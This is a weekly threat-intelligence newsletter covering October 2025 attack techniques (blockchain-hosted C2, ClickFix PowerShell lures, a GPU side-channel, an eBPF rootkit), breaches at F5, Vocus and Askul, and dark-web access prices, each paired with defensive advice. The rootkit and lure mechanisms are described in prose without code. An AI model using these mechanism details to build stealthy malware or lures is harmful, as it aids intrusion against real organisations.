The week witnessed significant nation-state activity, ransomware campaigns, and infrastructure breaches. F5 Networks disclosed a supply chain compromise exposing 600,000+ BIG-IP devices to zero-day exploitation. North Korean APT groups deployed blockchain-based malware through EtherHiding. Vocus telecommunications suffered SIM swap attacks affecting 1,600 customers. Japanese retailer Askul’s ransomware cascaded through Muji and Loft operations.

Key Statistics:

600,000+ F5 BIG-IP devices exposed
1,600 customers compromised in Vocus breach
34 SIM swaps executed via email compromise
5 new ransomware groups emerged on dark web
36% year-over-year ransomware increase

>>Outpace Attackers With AI-Based Automated Penetration Testing

New Attack Techniques

1. EtherHiding: Blockchain-Based Malware C2

Date: October 15-16, 2025 | Actor: UNC5342 (North Korea)

North Korean state actors pioneered blockchain-hosted malware delivery via smart contracts on Ethereum and BNB Smart Chain. JADESNOW malware queries smart contracts using eth_call (zero gas fee, no transaction record) to fetch encrypted payloads stored as contract data. This provides immutable, takedown-resistant C2 infrastructure indistinguishable from legitimate DeFi traffic. UNC5342 combines this with LinkedIn recruiter spear-phishing targeting developers.

Impact: Cannot be seized or disrupted through traditional ISP/domain takedown methods. Organizations with crypto operations face direct financial exposure.

CISO Takeaway: Monitor egress JSON-RPC queries to public blockchain nodes. Segment crypto wallet access to hardened workstations. Train HR on recruitment-themed social engineering targeting engineers.

2. ClickFix: Copy-Paste PowerShell Attacks

Date: October 19, 2025 | Analysis: Microsoft Threat Intelligence

Victims encounter fake error messages instructing them to paste obfuscated PowerShell commands into terminal. Base64-encoded payloads download LummaS infostealer or remote access trojans. Exploit-to-ransomware timeline: 18 minutes average. 517% surge in H1 2025.

Impact: Bypasses traditional security awareness training. Executes with user intent, evading behavior detection. No file writes-entirely in-memory execution.

CISO Takeaway: Deploy PowerShell Constrained Language Mode. Detect Base64 decoding in CLI execution. Enforce MFA on all remote access assuming credential compromise.

3. Pixnapping: GPU Side-Channel Android Attacks

Date: October 13, 2025 | Disclosure: CMU/UC/UW Researchers

Malicious Android apps (zero permissions required) extract on-screen content via GPU timing side-channels. Attackers steal 2FA codes, banking balances, private messages by analyzing GPU processing delays. Reconstruction occurs locally in under 30 seconds-no network traffic to detect.

Impact: Bypasses Android permission model. Works against any app with visual content. Partial Google patches available but modified exploits still function.

CISO Takeaway: Prohibit mobile 2FA for critical systems; use hardware keys instead. Deploy mobile threat defense with app invocation behavior analysis. Limit corporate data on BYOD devices.

4. LinkPro: eBPF Rootkit with Magic Packet Activation

Date: October 13-16, 2025 | Discovery: Synacktiv CSIRT

Advanced Linux rootkit deployed post-Jenkins compromise. eBPF kernel hooks hide files, processes, and loaded eBPF programs from inspection tools. Activates via “magic packets”-specially crafted TCP SYN with specific window size-opening hidden command channels. Persists as fake systemd-resolveld service.

Technical: XDP/TC eBPF programs intercept packets at driver level before Linux network stack. Filesystem hooks filter getdents64 results. Fallback: /etc/ld.so.preload userspace hooking for older kernels.

Impact: Operates below traditional endpoint detection visibility. Cannot disable eBPF without breaking cloud infrastructure. Malware remains invisible during routine monitoring.

CISO Takeaway: Deploy eBPF-aware monitoring (Falco, bpftool). Isolate Jenkins controllers from internet. Audit systemd units for typo-squatted daemon names. Hunt for /etc/ld.so.preload modifications.

Critical Incidents

F5 Networks Supply Chain Breach

Date: August 2025 (detected) | October 15, 2025 (disclosed)

Nation-state attackers maintained persistent access to F5 development infrastructure, exfiltrating BIG-IP source code, engineering documentation, and zero-day vulnerability details. Affects 600,000+ internet-exposed F5 devices globally (130,000+ in US).

Impact: Attackers possess complete F5 architecture understanding enabling custom zero-day exploit development. F5 devices (load balancers, firewalls, VPN concentrators) sit at network perimeters-compromise enables traffic interception and lateral movement. CISA Emergency Directive 26-01 mandates federal agency response within 7 days.

CISO Takeaway: Immediately apply F5 security patches. Disconnect F5 management interfaces from internet access. Deploy enhanced monitoring for F5-specific configuration changes and unauthorized administrative access. Assume zero-days exist in current deployments.

Vocus Group Telecommunications Breach

Date: October 17, 2025

Australian ISP Vocus suffered targeted compromise affecting 1,600 email accounts and 34 SIM swaps. Attackers accessed customer data from compromised email systems, extracted authentication details, purchased SIM cards, and fraudulently ported mobile numbers to attacker-controlled devices.

Impact: SIM swap victims face unauthorized access to SMS-based 2FA for banking, cryptocurrency exchanges, and email recovery. Demonstrates cascading attack from email compromise to financial fraud. Follows pattern: Optus (2022), Medibank (2022), Latitude Financial (2023).

CISO Takeaway: Telecom providers must require in-person ID verification for SIM changes. Implement non-SMS 2FA (hardware keys, authenticator apps) for sensitive accounts. Deploy SIM swap detection alerting customers of activation requests.

Askul Japan Ransomware Attack

Date: October 19-20, 2025

Japanese office supply logistics hub Askul suffered weekend ransomware attack, suspending e-commerce operations across three platforms. Cascaded to downstream retailers: Muji (halted online sales), Loft (fulfillment delays), Sogo & Seibu (partial outages). Demonstrates single-vendor logistics dependency risk.

Impact: Operational paralysis during peak retail season. 34 million+ individuals potentially affected indirectly. Supply chain disruption exposes third-party risk in centralized logistics models.

CISO Takeaway: Implement vendor risk management and security assessments. Establish business continuity plans with alternative logistics providers. Maintain buffer inventory reducing just-in-time dependency. Conduct vendor incident response tabletop exercises.

Dark Web Activity

New Ransomware Groups: Kyber, Nasir Security, Kryptos, Tengu, VFVCT emerged this week.

Established Activity: Qilin (19 victims), Akira (11 victims), INC (9 healthcare victims), RansomHub posted fresh victims.

DarkForums: 12,767+ members trading stolen data-South Korean credentials (45K), Vietnamese airline records (23M), alleged Huawei IP.

RAMP Marketplace: Compromised Fortune 500 VPN credentials ($5K-$50K), RDP access ($500-$5K), cloud infrastructure with admin rights ($5K-$25K).

Cryptocurrency Laundering: Shared wallet infrastructure among Kairos, Qilin, INC, SafePay. Increased privacy coin usage (Monero, Zcash).

CISO Takeaway: Monitor dark web for organizational mentions on leak sites. Assume breach as operational baseline. Maintain offline, immutable backups. Deploy 24/7 SOC with ransomware playbooks.